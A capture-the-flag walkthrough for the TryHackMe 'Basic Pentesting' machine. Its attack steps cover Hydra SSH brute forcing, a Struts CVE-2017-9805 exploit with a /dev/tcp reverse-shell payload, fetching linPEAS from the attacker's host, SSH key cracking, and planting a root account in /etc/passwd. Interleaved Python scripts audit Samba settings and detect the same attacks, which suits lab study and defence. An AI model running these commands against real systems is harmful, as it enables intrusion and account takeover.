
Basic Pentesting - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on enumeration, web directory discovery, SMB user enumeration, SSH brute forcing, and privilege escalation via a cracked SSH key.

Room URL: https://tryhackme.com/room/basicpentestingjt

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • Gobuster
  • smbclient / enum4linux
  • Hydra
  • Searchsploit
  • wget / Python HTTP server
  • linPEAS
  • ssh2john + John the Ripper
  • SSH
  • vim (SUID exploitation)

Step-by-Step Walkthrough

1. Enumeration

(Optional) Add host entry:

echo "<TARGET_IP> basic.thm" | sudo tee -a /etc/hosts

Nmap scan:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings include:

Port      Service   Notes
22        SSH       OpenSSH
80        HTTP      Apache
139/445   SMB       Samba
8009      AJP       Tomcat-related
8080      HTTP      Apache Tomcat
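The table above is the kind of summary you build by hand from the nmap.txt produced by -oN. The following Python script is an added example (not part of the original walkthrough) that parses that normal-output format: it keeps only port lines in the open state, skips script output (the |_ lines) and summary lines, and renders the same PORT/SERVICE/VERSION table. The scan text is a constructed sample with illustrative banners, not the room's real output.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of `nmap -sC -sV -oN` normal output. The versions shown are
# illustrative placeholders, not the room's real service banners.
SAMPLE_NMAP = """\
# Nmap 7.94 scan initiated as: nmap -sC -sV -oN nmap.txt 10.0.0.5
Nmap scan report for basic.thm (10.0.0.5)
Host is up (0.050s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE  SERVICE     VERSION
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu (Ubuntu Linux; protocol 2.0)
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open   ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open   http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat
9090/tcp closed zeus-admin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version text>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)
TARGET_LINE = re.compile(
    r"^Nmap scan report for (?:\S+ \()?(?P<ip>[0-9.]+)\)?", re.MULTILINE
)


def parse_target(text: str) -> Optional[str]:
    """Return the scanned IP from the 'Nmap scan report for' line, if present."""
    m = TARGET_LINE.search(text)
    return m.group("ip") if m else None


def parse_open_ports(text: str) -> List[Dict[str, object]]:
    """Collect open ports from -oN output; script lines and closed ports are ignored."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m or m.group("state") != "open":
            continue
        rows.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return rows


def render_table(rows: List[Dict[str, object]]) -> str:
    """Render rows as an aligned plain-text table with a header line."""
    headers = ("PORT", "SERVICE", "VERSION")
    cells = [(f'{r["port"]}/{r["proto"]}', str(r["service"]), str(r["version"]))
             for r in rows]
    widths = [max(len(c[i]) for c in cells + [headers]) for i in range(3)]
    fmt = "  ".join(f"{{:<{w}}}" for w in widths)
    return "\n".join(fmt.format(*c) for c in [headers] + cells)


if __name__ == "__main__":
    print("Target:", parse_target(SAMPLE_NMAP))
    print(render_table(parse_open_ports(SAMPLE_NMAP)))
```

Point the script at a real nmap.txt by reading the file instead of SAMPLE_NMAP; the regex is tolerant of the extra whitespace nmap uses to align columns and of service names ending in "?" when version detection is unsure.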

2. Web Enumeration

Check the page source; a useful hint appears in the HTML comments.

Brute-force directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40

Found: /development

Inside, read dev.txt and note:

  • Mentions Struts
  • Mentions SMB has been configured
  • Mentions version 2.5.12

3. SMB Enumeration (Users)

Method A: Anonymous SMB Access

Check for anonymous SMB shares:

smbclient //<TARGET_IP>/Anonymous
# Press Enter for an empty password (or add -N to skip the prompt)

Inside, you may find staff.txt with hints about users Jan and Kay.

Method B: enum4linux

Enumerate SMB to find valid users:

enum4linux -a <TARGET_IP>

Found users:

  • jan
  • kay
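Both SMB methods above work only because the Samba server permits anonymous sessions and a guest-accessible share. As an added example (not part of the original walkthrough), the following Python script audits an smb.conf for the settings that enable this: a weak configuration is shown beside a hardened one, and the audit flags map to guest other than Never, restrict anonymous below 2, and any share with guest ok (or its synonym public) enabled. Both configuration fragments are constructed for illustration and are not the room's actual smb.conf.

```python
import configparser
from typing import List, Tuple

# Constructed weak configuration: unknown users become guests and a share is open to them.
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
map to guest = Bad User
restrict anonymous = 0

[Anonymous]
path = /samba/anonymous
browseable = yes
writable = yes
guest ok = yes
"""

# Constructed hardened configuration: no guest mapping, no anonymous access, named users only.
HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
map to guest = Never
restrict anonymous = 2

[staff]
path = /samba/staff
browseable = no
writable = no
guest ok = no
valid users = @staff
"""

YES_VALUES = {"yes", "true", "1"}


def load_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like; keys contain spaces and may repeat, so disable strict mode."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    return cp


def audit_smb_conf(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) triples for settings that allow anonymous/guest access."""
    cp = load_smb_conf(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    # Samba's default is Never; Bad User / Bad Password turn failed logons into guest sessions.
    map_to_guest = g.get("map to guest", "Never").strip()
    if map_to_guest.lower() != "never":
        findings.append(("global", "map to guest", map_to_guest))
    # restrict anonymous = 2 refuses anonymous connections entirely; 0 is the default.
    restrict_anon = g.get("restrict anonymous", "0").strip()
    if restrict_anon != "2":
        findings.append(("global", "restrict anonymous", restrict_anon))
    for section in cp.sections():
        if section == "global":
            continue
        s = cp[section]
        guest_ok = s.get("guest ok", s.get("public", "no")).strip().lower()
        if guest_ok in YES_VALUES:
            findings.append((section, "guest ok", guest_ok))
    return findings


if __name__ == "__main__":
    print("weak:", audit_smb_conf(WEAK_SMB_CONF))
    print("hardened:", audit_smb_conf(HARDENED_SMB_CONF))
```

On a live host, run the audit over the output of testparm -s rather than the raw file, so that include directives and defaults are resolved; the usernames that enum4linux recovers come from the same anonymous session that restrict anonymous = 2 shuts down.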

4. SSH Brute Force (jan)

Use Hydra against SSH. Example:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP>

Result: A valid password for jan (redacted).
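From the defender's side, a Hydra run like the one above leaves a dense run of sshd "Failed password" lines from one source, often followed by an "Accepted password" from the same source once the list hits. The following Python script is an added example (not part of the original walkthrough) of detection logic over auth.log: it counts failures per source IP inside a sliding time window, raises a brute-force alert at a threshold, and raises a higher-severity alert if a login from a flagged source then succeeds. The log lines are constructed samples in OpenSSH's syslog format; the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List

# Constructed sample auth.log lines (OpenSSH syslog format); not taken from the room.
SAMPLE_AUTH_LOG = """\
Jan 10 10:00:01 target sshd[1201]: Failed password for jan from 10.0.0.9 port 50122 ssh2
Jan 10 10:00:02 target sshd[1203]: Failed password for jan from 10.0.0.9 port 50124 ssh2
Jan 10 10:00:02 target sshd[1205]: Failed password for invalid user admin from 10.0.0.9 port 50126 ssh2
Jan 10 10:00:03 target sshd[1207]: Failed password for jan from 10.0.0.9 port 50128 ssh2
Jan 10 10:00:04 target sshd[1209]: Failed password for jan from 10.0.0.9 port 50130 ssh2
Jan 10 10:00:05 target sshd[1211]: Accepted password for jan from 10.0.0.9 port 50132 ssh2
Jan 10 10:05:00 target sshd[1300]: Failed password for kay from 10.0.0.7 port 40001 ssh2
Jan 10 10:30:00 target sshd[1400]: Accepted publickey for kay from 10.0.0.7 port 40010 ssh2: RSA SHA256:CONSTRUCTED
"""

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted)\s+(?P<method>\w+)\s+for\s+(?:invalid user\s+)?"
    r"(?P<user>\S+)\s+from\s+(?P<src>\S+)\s+port\s+\d+"
)


def parse_ts(stamp: str, year: int = 1970) -> datetime:
    """Syslog stamps carry no year; an assumed year is enough for interval arithmetic."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text: str, threshold: int = 4,
                      window_seconds: int = 60) -> List[Dict[str, object]]:
    """Alert once per source that reaches `threshold` failures within `window_seconds`,
    and again if that source subsequently authenticates successfully."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append((parse_ts(m["ts"]), m["result"], m["method"], m["user"], m["src"]))
    events.sort(key=lambda e: e[0])

    recent = defaultdict(deque)  # src -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for ts, result, method, user, src in events:
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"kind": "bruteforce", "src": src,
                               "failures": len(q), "at": ts})
        elif result == "Accepted" and src in flagged:
            alerts.append({"kind": "success_after_bruteforce", "src": src,
                           "user": user, "method": method, "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The success_after_bruteforce alert is the one worth paging on: it is the signal that a guessed password actually worked. The mitigation the walkthrough implicitly relies on not being present is rate limiting (fail2ban or sshd's MaxAuthTries) and, better, PasswordAuthentication no so that only keys are accepted.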


5. Initial Access

Method A: SSH with Brute-Forced Credentials

SSH in as jan:

ssh jan@<TARGET_IP>

Method B: Apache Struts RCE (CVE-2017-9805)

The dev.txt file mentions Struts version 2.5.12, whose REST plugin is vulnerable to remote code execution through unsafe XStream deserialization (CVE-2017-9805).

Search for the exploit:

searchsploit "struts 2.5.12"
# Found: Apache Struts 2.5 < 2.5.12 - REST Plugin XStream RCE (42627.py)

Copy and run the exploit:

searchsploit -m 42627
python3 42627.py http://<TARGET_IP>:8080/struts2-rest-showcase-2.5.12/orders/3 "id"

For a reverse shell:

# Start listener
nc -lvnp 4444

# Run exploit with reverse shell payload
python3 42627.py http://<TARGET_IP>:8080/struts2-rest-showcase-2.5.12/orders/3 "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"

This gives you a shell as the tomcat9 user.


6. Local Enumeration (linPEAS)

Host linPEAS.sh from your machine:

python3 -m http.server 80

Download and run it on the target:

wget http://<YOUR_IP>/linPEAS.sh
chmod +x linPEAS.sh
./linPEAS.sh

A key discovery is an SSH private key in another user’s home, e.g.:

/home/kay/.ssh/id_rsa

Copy id_rsa to your machine for offline cracking.


7. Crack kay’s SSH Key Passphrase

Convert the key to a John hash and crack it with rockyou.txt:

/usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa.hash

Result: Passphrase recovered (redacted).


8. Login as kay

Fix key permissions and SSH using the key:

chmod 600 kay_id_rsa
ssh -i kay_id_rsa kay@<TARGET_IP>

9. Privilege Escalation

Method A: sudo bash (as kay)

If logged in as kay, escalation is simply:

sudo bash

Method B: SUID vim.basic

linPEAS may reveal a SUID binary:

-rwsr-xr-x 1 root root 2.4M Nov 24 2016 /usr/bin/vim.basic

Exploit this to edit /etc/passwd and add a root user:

Step 1: Generate a password hash:

openssl passwd -1 -salt hacker password123
# Output: $1$hacker$BtrWzHlP...

Step 2: Use vim.basic to edit /etc/passwd:

/usr/bin/vim.basic /etc/passwd

Step 3: Add this line at the end:

hacker:$1$hacker$BtrWzHlP...:0:0:root:/root:/bin/bash

Step 4: Save and switch to the new user:

su hacker
# Enter: password123

You now have root access.
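The SUID vim route above ends by planting a second UID-0 account with its hash stored directly in /etc/passwd, which is exactly the kind of change a host baseline check should catch. As an added example (not part of the original walkthrough), the following Python script audits /etc/passwd content for accounts other than root with UID 0, duplicate UIDs, password hashes stored in the world-readable passwd file instead of /etc/shadow, and empty password fields. The file content is a constructed sample (the hash is a placeholder), not a copy of the room's /etc/passwd.

```python
from typing import Dict, List

# Constructed /etc/passwd content showing a planted UID-0 account; the hash is a placeholder.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kay:x:1000:1000:kay:/home/kay:/bin/bash
jan:x:1001:1001:jan:/home/jan:/bin/bash
tomcat9:x:997:997::/var/lib/tomcat9:/bin/false
hacker:$1$hacker$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
backup::34:34:backup:/var/backups:/usr/sbin/nologin
"""

# Values that mean "look in /etc/shadow" or "locked"; anything else in field 2 is suspicious.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> List[Dict[str, object]]:
    """Return one finding per issue, each with the line number, issue name and user."""
    findings = []
    uid_owner: Dict[int, str] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "issue": "malformed", "user": fields[0]})
            continue
        name, pw, uid_s, _gid, _gecos, _home, _shell = fields
        if not uid_s.isdigit():
            findings.append({"line": lineno, "issue": "non_numeric_uid", "user": name})
            continue
        uid = int(uid_s)
        # Any UID-0 account besides root is a root-equivalent backdoor.
        if uid == 0 and name != "root":
            findings.append({"line": lineno, "issue": "extra_uid0", "user": name})
        if pw == "":
            findings.append({"line": lineno, "issue": "empty_password", "user": name})
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append({"line": lineno, "issue": "hash_in_passwd", "user": name})
        if uid in uid_owner:
            findings.append({"line": lineno, "issue": "duplicate_uid", "user": name,
                             "also": uid_owner[uid]})
        else:
            uid_owner[uid] = name
    return findings


def is_clean(text: str) -> bool:
    return not audit_passwd(text)


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f)
```

Run it against the live file with audit_passwd(open("/etc/passwd").read()) from a scheduled job, and pair it with an auditd watch on /etc/passwd and a periodic SUID inventory, since the vim.basic SUID bit is the precondition this whole escalation depends on.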


Notes

  • Don’t leave cracked passwords/flags in your published notes. Redact them.
  • enum4linux is often the fastest path to real usernames on SMB targets.
  • Cracking SSH keys (ssh2john + john) is a common CTF pattern.